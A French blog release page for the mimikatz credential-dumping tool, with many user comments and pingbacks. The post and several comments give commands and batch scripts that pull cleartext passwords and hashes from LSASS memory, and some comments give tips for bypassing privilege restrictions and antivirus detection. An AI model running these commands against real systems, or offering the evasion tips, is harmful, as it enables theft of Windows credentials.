mimikatz

mimikatz 2.0 vient de sortir en version alpha

Pour les pressés cherchant des mots de passe…

A exécuter en administrateur :

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

559 réflexions sur « mimikatz »

  1. Ping : effeciently dumping Windows password hashes « Daniel Weis's I.T Security Blog

  2. Ping : effeciently dumping Windows password hashes - Daniel Weis - Blogs - Telligent

  3. Ping : Dis9 Team » Dump Windows password hashes efficiently

  4. Ping : Mimikatz Contraseñas de Windows « Seguridad y Redes

  5. Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) « sanchezdiego.com.ar

  6. Ping : Latino » Blog Archive » Mimikatz Contraseñas de Windows

      • many thanks for your explain: « it keeps them in memory ». If user do not login and logout we can not exploy this tool.

      • Hello author, why does my password column always show null?

  7. Ping : Dumping Cleartext Credentials with Mimikatz « Daniel Weis's I.T Security Blog

  8. Ping : Dumping Cleartext Credentials with Mimikatz - Daniel Weis - Blogs - Telligent

  9. Ping : Security News « CyberOperations

  10. Ping : mimikatz: Tool To Recover Cleartext Passwords From Lsass – Dacheng Luo

  11. Ping : Jeremiah Grossman, Security News – Episode 278 » 華人資安論壇與資安認知教育網誌

  12. Ping : FeiFei's Blog » 获取Windows系统明文密码神器

  13. Ping : 调试器神器 – mimikatz-获取windows处于active状态账号明文密码[转] | Vision's Blog

  14. Ping : 轻量级神器 mimikatz – 直接抓取 Windows 明文密码! - Firedli's Blog

  15. Ping : 通杀WIN服务器得明文密码神器

  16. Ping : Outils, services, sites à (re)découvrir 2012 S08 | La Mare du Gof

  17. secpol.msc -> Local Policies -> User Rights Assignments -> Debug Programs
    Remove Administrators/System
    This is also how you stop Pass-The-hash from working too.
    I’ve tried on Win7 and XP SP3 (english) and I get this error on XP
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 640
    Erreur : Impossible d’injecter ! ; (0x00000008) Not enough storage is available to process this command.
    Same wtih Win7(64-bit) only the hex is different
    Erreur : Impossible d’injecter ! ; (0xc0000022) {Access Denied} A process has requested access to an object, but has not been granted those access rights.

    • Nevermind :) I was not using the 64-bit (x64) version on my 64-bit OS.
      Also to work around removing the sedebug priv using group policy and or secpol.msc, you can run as system (psexec -s cmd.exe) and everything works well. Very good tool, I hope you make even more additions! (@dumpall would be cool too, dump anything and everything this tool has to offer)
      -william

    • 0x00000008 is from NT 5 RDP session, not because debug right removed ;)
      in both case : psexec -s XXX … no need of debug right, and bypass session isolation in RDP ;)

  18. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码!

  19. Ping : 百寞' Blog » Blog Archive » 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码!

  20. Ping : 转:windows下轻量级调试神器—mimikatz – 2哥博客|H3CIE|网络技术|数据中心|路由交换|网络安全|黑客技术|CCIE|Linux|服务器|wordpress

  21. Ping : 神器mimikatz使用命令方法总结 | Vision's Blog

  22. Ping : mimikatz的使用方法总结 « Crackerban Team

  23. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! « x7z|关注网络安全|Web安全|最新0day漏洞|网站安全顾问

  24. Isn’t this how Windows can send HTTP-Authentication using IE without prompting for the password? If so, could a program like Firefox, launched as the same user who is logged on, read those credentials and also pass HTTP-authentication without being prompted? This could add functionality to something like FF if this was so, could it not? I mean IE does it…
    -mandingo-

  25. Ping : Unsung Heros (the list) « Cатсн²² (in)sесuяitу / ChrisJohnRiley

  26. C:\Program Files\WinRAR\ts\Win32>mimikatz.exe
    mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
    // http://blog.gentilkiwi.com/mimikatz
    
    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
    
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 452
    Erreur : Impossible d'injecter ! ; (0x00000008) 存储空间不足,无法处理此命令。
    
    mimikatz #

    help me

  27. FYI, Windows 8 (dev-preview) is working for me so far. Haven’t tried all the commands yet but so far so good. Is there a way to run all commands planned? Maybe output to a single file?
    -mandingo-

  28. Ping : Drunken Security News – Episode 279 » 信息安全播客

  29. Ping : Tonya Bacam, Security Onion – Episode 279 » 華人資安論壇與資安認知教育網誌

  30. Ping : Live from CCDC – Episode 280 » 華人資安論壇與資安認知教育網誌

  31. Ping : Recuperando contraseñas de Windows en texto plano (I de II)

  32. Ping : 牛X神器-mimikatz | Yoio's Blog

  33. Ping : 欺天: NLP | HACK | 社会工程学 | 金融

  34. Ping : Remotely Recovering Windows Passwords in Plain Text « CYBER ARMS – Computer Security

  35. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Linglin'S Blog

  36. Ping : Episode 647 – Quantum Encryption,TriCk, 100 days, Mimikatz, and MySQL DoS | InfoSec Daily

  37. Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) | GEEKNOPATAS

  38. Пополним коллекцию благодарностей на иностранных языках :)
    Спасибо!

  39. Ping : Pw » 关注互联网技术,专注于信息安全,记录生命点滴故事.

  40. Ping : Recovering Windows Passwords Remotely in Plain Text | IT Security

  41. Ping : mimikatz获取Windows系统明文密码神器 | 网络大学|Network University

  42. Ping : Mimikatz creator to Speak at PH Days Conference « CYBER ARMS – Computer Security

  43. LOL,C’est un logiciel qui peut faire beaucoup de trucs,ça me plais beaucoup ^.^
    mais il y a trop de méthodes TT,chaque fois je dois venir ici pour chercher le rappel ,peut-être c’est moi qui me suis trompé ,puisque la langue française est compliqué pour nous ,toute façon il faut apprendre .
    Bon courage et je vous souhaite une très bonne année 2012 .

  44. Very nice work. I successfully got clear text passwords by injecting into LSASS on Windows 2008 R2, however, I had a problem on Windows 7 x64. I launched a local cmd.exe shell as Local System by using PsExec. From there I launched mimikatz. After typing @getLogonPasswords, the data was there but the wdigest passwords were completely garbled text. I guess something went wrong with the injection. I wonder if it has anything to do with ASLR.

    • No problem with ASLR ;) It must be unicode or incorect unicode string for computer account, but appear to be valid in unicode… :( (try chcp before ;))
      Why did you use psexec for get system ? you can use privilege::debug

      • Yes, privilege::debug worked better. On this PC, I was only able to retrieve my smartcard PIN, because I don’t log in with my password. :)

      • Yeah — it showed just the portion of the PIN that I type to login/unlock my PC. It did not of course display the automatically changing code that is shown on the LCD display. :)

  45. Note that I must have recently unlocked my PC in order for the RSA SecureID PIN to show up — if I have not logged in or unlocked the PC within 30 minutes or so, the PIN does not appear in the list. Alright, here is my mimikatz output. I ran it first, and did not see RSA PIN. Then, I locked my workstation and then unlocked it, then I ran @getLogonPasswords again. Then I did see my RSA PIN displayed. I have tried to change names and hashes to protect the innocent. :)

    mimikatz # @getLogonPasswords
    
    Authentification Id         : 0;618713
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :
            tspkg :         n.t. (LUID KO)
    
    Authentification Id         : 0;613648
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :
            tspkg :         n.t. (LUID KO)
    mimikatz # @getLogonPasswords
    
    Authentification Id         : 0;618713
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :       THIS_IS_MY_RSA_PIN
            tspkg :         n.t. (LUID KO)
    
    Authentification Id         : 0;613648
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :       THIS_IS_MY_RSA_PIN
            tspkg :         n.t. (LUID KO)
    • So funny :), maybe you can try @getLogonPasswords full for « full » informations.
      Is your NTLM(RSA_PIN) same as msv1_0 NTLM hash ?

      I’m @PHDays, unfortunately I cannot test it now :)

      • That’s a good question… I’ll have to crack it with something like ighashgpu. Since I know what it is, it should be pretty easy to crack the hash. :)

      • You don’t have to do that !
        whent it’s available, take the cleartext pin code , hash it in NTLM, compare :)

  46. Sorry, I got distracted with other things…

    No it’s odd – mimikatz will dump my SecureID PIN as the « wdigest » but the corresponding NTLM hash does not match either the PIN or my user account password. I don’t know what it is.

  47. Ping : Security News #0×11: Take Hold of the Flame « CyberOperations

  48. Ping : Recovering Clear Text Passwords – Updates « CYBER ARMS – Computer Security

  49. i download your source code .but i find something could not find ,link the function GetMSVLogonData, can you show how does it work ? thank you ! :)

  50. Ping : 神器mimikatz使用方法 | Individual World

  51. Ping : 法国黑客神器 mimikatz 直接读取管理员密码 通杀xp win2003 win7 win2008 初体验 | 执魄's Blog

  52. Ping : 神器mimikatz | WG1博客

  53. Ping : 抓Windows系统的明文密码 - F19ht's blog

  54. Ping : Làm thế nào để đồng bộ Active Directory Sync trong khi Username và Password bị mã hoá theo OS 32/64bit ? (tiếp theo) | Thangletoan’s Weblog

  55. Ping : 神器mimikatz | 冰锋刺客

  56. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Startend.Blog's

  57. Ping : 神器mimikatz | 潇湘博客

  58. Ping : mimikatz - 网站安全,服务器安全,防御检测

  59. Ping : Password Cracking « Aggressive Virus Defense

  60. mimikatz вещь зачётная!
    Посмотрел презентацию, увидел слово СПАСИБО!
    т.ч. может поймёшь) Большое спасибо тебе!

  61. Ping : 问君几多愁 » msf中使用MIMIKATZ

  62. Ping : 神器 – mimikatz | 小兮博客

  63. Ping : Lóránd Somogyi » Openconnect replacement for Cisco AnyConnect on Linux (Ubuntu)

  64. Ping : Grab Windows Password In Plain Text!!!

  65. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | 小i博客

  66. Ping : 如何获取已登录账户的Windows密码 | lzsb.me

  67. Mimikatz FTW! Allowed me to circumvent my IT department’s issuing of a new RSA certificate when I changed my home PC, thus saving much time and stress. Merci!

  68. Ping : Windows 8 Clear Text Passwords from Locked Desktop with Mimikatz « CYBER ARMS – Computer Security

  69. Ping : Saber la pass del ADMIN « 3lhacker – Comunidad Informatica

  70. Bonjour,

    Pour info, mimikatz ne fonctionne pas sous windows 2003 enterprise (english) en version pré-servicepack.
    “The procedure entry point EncodePointer could not be located in the dynamic link library KERNEL32.dll”. La version de la dll est 5.2.3790.

    Cela fonctionne bien une fois le SP2 installé (SP1 non testé).

    Un grand merci pour l’outil!

  71. Ping : 2012 in Review and a Look Forward to 2013

  72. 这全是鸟语啊,外国的黑客,你们好!你说的我完全不懂昂,真不知道你们的鸟语,你怎么学会的呢!

  73. Ping : Metasploit: Postexploitation – Passwort im Klartext auslesen | freie-welt.com

  74. Ping : 本机Windows密码查看神器-mimikatz | 千行站

  75. Ping : Metasploit: Postexploitation – Passwort im Klartext auslesen | freie-welt.com

  76. Ping : Jak na export privatniho klice certifikatu, kdyz je oznacen jako non-exportable | logon

  77. Ping : 直接爆WIN2003+服务器的管理员密码的Mimikatz软件 | 紫云残雪's Blog

  78. Ping : Hacking Windows with Password Grabbing | ColeSec Security

  79. Ping : Remotely Recovering Windows Passwords in Plain Text « ITSolutionDesign

  80. Ping : .:[ d4 n3wS ]:. » Mimikatz

  81. Ping : 神器mimikatz使用命令方法总结 | rambowind

  82. Ping : 扫雷神器 – mimikatz

  83. Ping : Obtener contraseña de administrador de Windows desde el propio Windows | DURKH3IM'S BLOG

  84. Ping : mimikatz-en (English Translation of Mimikatz) Release « AttackVector.org

  85. Ping : 法国黑客神器 mimikatz 直接读取管理员密码 通杀Win系 – 思安阁

  86. Ping : Wouter Veugelen blog » English version of Mimikatz: Mimikatz-en.exe

  87. Ping : WCE and Mimikatz in memory over meterpreter | Justin - Blog

  88. Ping : mimikatz | Blog de Gentil Kiwi | opexxxblog

  89. Can you attack remote PC’s with this or you have to be on the actual clients machine to run this? You would also need to have admin rights I’m assuming.

    Good tool, now just trying to see if it can be executed to gain access to a remote pc. I’m the IT guy at work.

    Keep up the good work.

  90. Ping : Reflective DLL Injection with PowerShell | clymb3r

  91. Ping : [Intermédiaire] Récupérer un mot de passe Windows avec Mimikatz | Yoann's Workshop

  92. Ping : Modifying Mimikatz to be Loaded Using Invoke-ReflectiveDLLInjection.ps1 | clymb3r

  93. Ping : [Sécurité] Mimikatz | aurelienantonoff

  94. Microsoft Forefront is detecting the Alpha as well as RC of Mimikatz, is there a way we can run it without encrypting the exe to bypass the AV.

  95. What commandline format in new alpha version ?

    mimikatz.exe privilege::debug sekurlsa::logonPasswords exit >> result.txt

    in batch mode is crash

  96. Ping : 記某次主機提權 | Dave's Blog

  97. Ping : Goading Around Firewalls | Strategic Cyber LLC

  98. Ping : Dumping Clear Text Credentials from Windows | GSR8 Blog

  99. Ping : PTSec – Portal de Segurança Português » [Tutorial] Passwords do Windows XP, 7, 8 em plaintext

  100. Ping : Mimikatz & WCE & Metasploit

  101. Ping : mimikatz – Clear Text Passwords | Hacking Defined

  102. Will I be able to export a Certificate along with it’s private key even if the key isn’t exportable and import the Certificate to another computer?

    Thanks.

      • Well is there any way that you know for sure? I need to format my computer and reinstall windows, but before I do, I want to make sure that I will be able to use my certificate again.

        Is there a way to do this?

        Thanks.

  103. Ping : 如何导出Windows哈希系列一- FreebuF.COM

  104. Ping : Export Non-exportable Certificate Keys from store

  105. Ping : 如何导出Windows哈希系列一 | GERFALKE

  106. Ping : Chinadu`s Blog » 如何导出Windows哈希系列一

  107. Hi mate, awesome tool. any chance it will be able to dump domain user hashes (usually from ActiveDirectory) in NTLM / LM format? I have yet to find a program which is lightweight or small that can do it would be great man!

    keep it up!

  108. Ping : Are “unexportable” certificates a real security measure or just security theater? - Just just easy answers

  109. Ping : Recovering Plain Text Passwords with Metasploit and Mimikatz | CYBER ARMS - Computer Security

  110. Ping : Cannot export certificate with private key? | Frederick Dicaire

  111. why is it that I cannot unzip these binaries? Am I missing something? Tyring to use it in conjunction with USB rubber ducky and it doesn’t seem to want to unzip with 7zip or RAR

  112. mimikatz # sekurlsa::minidump c.dmp
    Switch to MINIDUMP
    
    mimikatz # sekurlsa::logonPasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) !=
     PROCESSOR_ARCHITECTURE_INTEL (0)
    ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
    
    mimikatz #
  113. I’m struggling with 2.0 version in order to export certificates. The « crypto::certifcates » only lists me certificates stores, but no idea how to export… Please advice

  114. Hi, thank you for this tool. What can you do with high protected certificates?
    Do you know what function verifies the password for export private key?

  115. Hey =)
    it is posible to use mimikatz with a Ram Dump?
    If not, this would be a nice feature.

    Greets from Germany
    Chris

      • Thanks, but i only have complete images in RAW Format. Do you know any way to extract passwords out of that?
        and could you PLEASE PLEASE PLEASE write your error messages in english =( ?

      • MANY THANKS TO YOU to Programm the WinDbg extension!!! i saw a post yesterday on twitter with a comment to with extension, today i checked it out. It is VERY NICE! a had a little Fight with the wow64exts in WinDbg but finally it Worked! Many thanks an greets from Germany!
        Greets Chris

  116. Ping : Hash传递攻击Windows2012远程桌面 | Panni_007 Security

  117. Ping : 【Windows】利用mimikatz解出登入中使用者密碼 | Lun

  118. Ping : Dumping passwords in a VMware .vmem file - Remko Weijnen's Blog (Remko's Blog)

  119. Ping : The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1 « Alex Ionescu’s Blog

  120. Ping : TEKNOLOJİ : Bellekten Parolaların Elde Edilmesi – 2 | YÜKSEK STRATEJİ

  121. Excellent l’information pour le hash SHA1 DPAPI! Reste encore la question comment il est généré depuis Windows Vista, vu que ce n’est plus « simplement » SHA1(UNICODE(mot de passe))?

  122. Ping : Using CVE 2013-5065 | s0ze.com

  123. Ping : Достаём пароли от всех активных учетных записей на windows 7 и 2008 | soft-spy.ru

  124. (sorry I write in English, mon français n’est pas très bon)

    I’ve seen that Windows 8.1 is supported in alpha 2.0 version.
    However, clear password dump is not available anymore.

    Is because of a new protection (or a better handle) of Windows 8.1?

    I have found no information regarding the new countermeasures in Windows 8.1.

    Do you have any information about this regards?

    And congrats for the great and so useful tool!

    • mimikatz dumps password when they’re in memory, when they’re not…. ;)

      Windows 8.1 does not keep passwords in memory as usual. Only LiveSSP as I’ve seen (or when you enable Credentials Delegations)

  125. Having a buggy issue with mimikatz alpha 2.0 x64 and Windows 8.1 enterprise.

    When using either procdump with sekurlsa::minidump… or mimikatz alone to pull lsass.exe… I do not get any passwords from a Windows 8.1 x64 system that has just been logged into. No errors, just « password: (null) » everywhere I would expect a password.

    If I lock the system, and unlock using a password… then run procdump or mimikatz again… I DO get a correct password.
    It seems the first logon password is not stored in lsass process memory, or not at the offset that mimikatz is looking. But subsequent credential input is properly retrieved (such as lock and unlock).
    In Windows 7 x64… works perfectly. Can pull passwords from very first logon.

    • As you’ve seen, this is not a mimikatz issue ; Windows 8.1 does not store « by default » passwords in memory (see previous comment)
      Like in NT5 with Kerberos provider, some passwords fields are populated after unlocking.

      You can check this with : sekurlsa::searchpasswords.
      It searches the whole process for credentials, and it’s provider / offset independent.

  126. I am using the new version. I try to export a certificate from the computer store, but cannot figure out how to change the store. Is there a way to do this?
    Thank you for the tool,
    -D

    mimikatz # crypto::stores
    Asking for System Store ‘CERT_SYSTEM_STORE_CURRENT_USER’ (0x00010000)

  127. Has something changed with the new version?

    It used to work on my Win7 Enterprise 64bit, but suddenly not anymore. (running the 64bit version). It looks like the password is still hashed / encrypted.. Anyone else have this problem? Other than that, excellent tool, much respect!

    Merci pour ton feedback!

    Output example (I replaced some info with XXXXXXXXXX)

    User Name         : XXXXXXXXXX
    Domain            : NT Service
    SID               : S-1-5-80-997390408-XXXXXXXXXX-3119169589-2253446180-22265637
    86
            msv :
             [00000003] Primary
             * Username : XXXXXXXXXX
             * Domain   : UK
             * LM       : 00000000000000000000000000000000
             * NTLM     : 3bdf6dc3f414a299b1acfdaa80d8030d
             * SHA1     : 3b6264001febc9917d700cb04f1307667fcfb050
            tspkg :
             * Username : XXXXXXXXXX
             * Domain   : UK
             * Password : b2 28 3b f5 eb 00 d3 31 1f 4b 57 1d 86 ca 1f ca 8f c1 36 a
    1 cf e0 73 20 70 a6 47 12 de 25 37 b8 48 9c 3f 3e 06 03 64 d0 5c e6 cd 28 fc d3
    38 ac 08 a0 bc bb 5a bf b7 7b d3 0b 92 7b 56 32 26 c0 d8 b0 f1 8a ce cb b5 df ce
     a4 36 69 b8 be f7 55 4a 03 05 8b a7 79 d8 de 11 06 5e e3 27 9d f7 9f 81 dd a0 2
    a 1f 83 3b a2 75 ee 08 7d e3 a5 cf 17 29 73 77 8a d8 dc 59 8f 3d 09 70 f9 1a d5
    1a 23 5c fa 03 7b b0 18 d4 3f da d4 1e 94 2d 0b b1 e7 6f f1 f3 1e a7 ab 21 0a 36
     c6 64 05 5e 11 cf 9a cf f5 42 f6 c9 ed 0d ee a9 4a 3a 6c 44 cf d5 f1 c8 fd eb 3
    6 a6 93 ee c5 14 d1 6f b1 0e 01 30 44 3c 3d 3d c4 30 e4 77 e8 5e 12 7a 8f ee 60
    c2 3d dd 84 a5 6a 75 07 32 ff bd 84 84 8f ff 8c 17 a1 54 7a fe dc 52 74 b9 cb 6e
     d2 62 6c d6 ec 35 b6
    • Hi Michel,

      Services passwords, computers passwords, and some others are not necessary « human readable ». Nobody type them ! so in some cases Windows generates random « binary » passwords !

      In your case b2 28 3b f5 [...] d6 ec 35 b6 is the real binary passwords =)

      const BYTE pwd[] = {0xb2, 0x28, 0x3b, 0xf5, [...], 0xd6, 0xec, 0x35, 0xb6};
      SHA_CTX shactxInput;
      SHA_DIGEST shaInput;
      
      A_SHAInit(&shactxInput);
      A_SHAUpdate(&shactxInput, pwd, sizeof(pwd));
      A_SHAFinal(&shactxInput, &shaInput);
      
      kull_m_string_wprintf_hex(shaInput.digest, SHA_DIGEST_LENGTH, 1);

      Output is : 3b 62 64 00 1f eb c9 91 7d 70 0c b0 4f 13 07 66 7f cf b0 50, your SHA1 ;)
      mimikatz credentials output routine try to detect if the password is a printable string, if not, it display it in hex.

  128. Hello again!

    Thanks so much for the quick reply! This still leaves me with a couple of questions though:
    1) I thought Mimikatz would look for the password stored in memory, which is supposed to be cleartext.
    2) Mimikatz used to work on my computer perfectly, and suddenly it only produces hashes (Is the previous version of Mimikatz still available somewhere?)
    3) A SHA1 hash is (I think) very hard to decrypt, so Mimikatz doesn’t always work on all systems?

    Thanks again for the feedback!

    Cordialement, Michel

    • Mes excuses! J’ai vu que je peux encore retrouver le mot de passe avec la nouvelle version MK :) Vous pouvez supprimer mes deux commentaires si vous voulez.

      Merci de nouveau et bàt, Michel.

  129. Ping : HackLab

    • Yep, depuis Avril 2012… heureusement le code source est disponible ;)
      Pour Symantec, ce que j’avais adoré à l’époque :
      « The tool allows an attacker to perform the following actions on the computer:

      • Cheat at minesweeper. »
  130. I love Mimikatz it is a great tool.

    I like to procdump memory and then use the minidump function to process the dump off the client so even if Mimikatz is picked up by AV and cant be run locally it will still work! ;-)

    But I sometimes get a « MAJOR VERSION » error.

    Is this because I am using the wrong version of Mimikatz?

    Or does it mean that I am trying to work with a version of windows such as XP which doesnt natively have the Tkspg, Wdigest or Kerberos TGT functionality and it is the version of Windows that is wrong?

  131. Ping : Security News #0×68 | CyberOperations

  132. Ping : PowerShell Magazine » Accidental Sabotage: Beware of CredSSP

  133. Ping : 神器mimikatz发布2.0 | Jarett's Blog

  134. Ping : Logging on as Domain Admin to end user workstations? Think again! | Tailspintoys – 365lab.net

  135. Ping : Exporting the not exportable – on the topic of Windows crypto key storage | Notes on open source and random ramblings

  136. Ping : procdump与mimikatz绕过杀毒软件读取密码 | Ends

  137. Ping : 神器mimikatz发布2.0_安全工具-十堰网络安全研究中心

  138. Ping : CARA MENGETAHUI PASSWORD LOGIN ADMINISTRATOR PADA SISTEM OPERASI WINDOWS | NEWBIE26 INSIDE

  139. Ping : Backdoor в Active Directory - Mimikatz Golden Ticket | Levinkv's Blog - Информационная БезопасностьLevinkv's Blog – Информационная Безопасность

  140. Ping : Remote Desktop’s Restricted Admin: Is the Cure Worse Than the Disease? - Hedgehog Security

  141. Ping : Remote Desktop’s Restricted Admin: Is the Cure Worse Than the Disease? | GeekTime

  142. If I dont run privilege::debug I get « ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005 ». Is there somewhere in your blog explaining whats going on here that requires it to be run first?

  143. Ping : How to Break Windows 8 Picture Password Security | Windows 8 Password

  144. Ping : EXTRAYENDO CONTRASEÑAS DE LA RAM CON MIMIKATZ 2.0 | SECTRACK DOMINICANA

  145. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! | 旭达网络科技(深圳)有限公司专业架设各种服务器

  146. Ping : Windows Logon Password – Get Windows Logon Password using Wdigest in Memory Dump | Forensic Focus - Articles

  147. Ping : 三菱東京UFJに蔑まれているMacでBizSTATIONを使う | 高橋文樹.com

  148. Ping : Meterpreter Kiwi Extension: Golden Ticket HOWTO | Strategic Cyber LLC

  149. Ping : Anonyme

  150. Ping : Retrive windows password in cleartext | Technical guides by Gsec.se

  151. Ping : Mimikatz: A nasty little piece of awesomeness | Deep InfoSec

  152. Ping : 神器mimikatz 2.0 - 中国X黑客小组

  153. Ping : Adli Bilişim İncelemelerinde Mimikatz İle Şifre Elde Etme | Halil ÖZTÜRKCİ

  154. Ping : Exploit a Windows system memory and get clear text passwords

  155. Ping : 强制抓取本机登录密码 神器mimikatz2.0发布 | 老D

  156. Ping : Windows密码抓取神器mimikatz2.0发布 - Z 's

  157. Ping : Windows密码抓取神器mimikatz2.0 | 扯蛋

  158. Ping : The path to the Golden Ticket | Count Upon Security

  159. Ping : Export non-exportable certificate – DotMS

  160. Ping : PowerShell Magazine » PowerSploit

  161. Ping : PowerShell Magazine » Owning Networks and Evading Incident Response with PowerShell

  162. Ping : 密码抓取神器mimikatz2.0发布 | 七行者博客

  163. Ping : Sacar las contraseñas de Windows con mimikatz. | SmythSys IT Consulting

  164. save this file as anyname.bat and run as administrator with CMD.
    @echo off
    For /f « tokens=2-4 delims=/  » %%a in (‘date /t’) do (set mydate=%%c-%%a-%%b)
    For /f « tokens=1-2 delims=/: » %%a in (‘time /t’) do (set mytime=%%a%%b)
    mm.exe privilege::debug sekurlsa::logonpasswords exit > %mydate%_%mytime%

  165. Ping : The Evolution of Protected Processes – Part 1: Pass-the-Hash Mitigations in Windows 8.1 | My Website

  166. Ping : Cached Domain Credentials in Vista/7 (AKA Why Full Drive Encryption is Important) - Hedgehog Security

  167. Ping : Sthack 4.0 : Confs & Ctf in Bordeaux ! – WordPress

  168. Ping : Recopilación de herramientas de seguridad informática | Seguridad Informatica

  169. Ping : Lista com ferramentas de segurança e pentest | Mundo Tecnológico

  170. Ping : Sthack 4.0 : Confs & Ctf in Bordeaux ! | WordPress

  171. Ping : Decrypt / Recover Windows 8 Pin Code and Picture Password Instantly - eBrahma

  172. Ping : Pass-the-Golden-Ticket with Cobalt Strike’s Beacon | Strategic Cyber LLC

  173. Ping : 神器mimikatz,从lsass里抓密码 | 龍's Blog

  174. Est-il possible d’utiliser seulement la dll mimilib pour récupérer les mots de pass par programmation, Et si oui, y-a-t-il un descriptif des fonctions inclues dans la dll et des paramètres à utiliser?

  175. Ping : mimikatz : Export non-exporteable Private certificate from Symantec PKI | The Unix Tips

  176. Hello, seems great, but how can i make it FUD ?
    do you have a nice crypter to do it ?
    because for the moment, Windows delete it instantly :(
    (avast i assume)

    thanks :)

  177. thank you for mimikatz! I’ve problem to export computer certificare, i can export only user certificate. Is it possibile to change store system to local machine? I haven’t find the command for that.

  178. Hi – great work I love the tool :)

    I just have one question, what the heck does mimikatz mean? :D

  179. Ping : The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1 » Sean's Tech Notebook

  180. Ping : 利用Mimikats提取虚拟机内存中的密码 | BugSec

  181. Ping : 利用Mimikatz提取虚拟机内存中的密码 - FreeBuf.COM

  182. Ping : Mimikatz İle Şifre Elde Etme | caglar's space

  183. Ping : Passwörter, wie geheim sind sie wirklich? | Sylvio's Infobox

  184. Ping : 利用Mimikats提取虚拟机内存中的密码 – 中国 X 黑客小组

  185. Ping : 直接从 lsass.exe 里获取windows处于active状态账号明文密码 | 天下英雄出我辈,一入江湖岁月催。 鸿图霸业谈笑间,不胜人生一场醉。 提剑跨骑挥鬼雨,白骨如山鸟惊飞

  186. Ping : Anonyme

  187. Hello guys!
    First of all, this crypto tool is simply fantastic!!!!

    I have a simple question:
    Is there any way to export the private key which is inside a eToken or smartcard? I tried the tool, but even with the capi and cng patches it didn’t work.

    Is there anything that can be done to export a private key inside an eToken?

    Thanks
    HJ

    • I was also wondering if this is possible. I’ve seen this comment – « Some smartcard crypto providers can report a successfull private export (it’s not, of course :wink:) », so I’m not sure if that means there is no way to do it, or additional steps need to be taken. Could anyone elaborate please?

      • Responding to my own post, after further reading it looks like even if you are using a software based smartcard crypto provider, part of the key is stored in the trusted platform module chip soldered to your motherboard which is considered secure (it’s been hacked through extreme processes and measures over a period of months and is not a practical exploit).

        Someone please correct me if I am wrong!

  188. create bat script and run using cmd
    @echo off
    mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > %random%%random%.txt

  189. Ping : Give me any zero-day and I will rule the world | Strategic Cyber LLC

  190. Bonjour

    Je créé un minidump via le taskmanager et voici ce que j’obtiens aprés sur la même machine …. Merci de m’éclairer ;-)

      .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Oct 31 2014 13:30:06)
     .## ^ ##.
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'    Microsoft BlueHat edition!       with 14 modules * * */
    
    
    mimikatz # sekurlsa::minidump c:\temp\lsass.dmp
    Switch to MINIDUMP : 'c:\temp\lsass.dmp'
    
    mimikatz # sekurlsa::logonPasswords full
    Opening : 'c:\temp\lsass.dmp' file for minidump...
    ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) != PROCESSOR_ARCHITECTURE_INTEL (0)
  191. Merci de ta réponse, Quoiqu’il en soit BRAVO pour ton travail, je pense que mon Pb vient du fait de la compilation sous VS 2013 qui est peut être par défaut en 32 bits….

  192. Ping : How Attackers Extract Credentials (Hashes) From LSASS » AD Security

  193. Ping : mimikatz | H!Ang Blog( ̄▽ ̄)~■

  194. Ping : KRBTGT: Active Directory’s Domain Kerberos Account » AD Security

  195. Fantastic tool…. How would i be able to invoke the DLL to call and return the vales from c# any ideas???

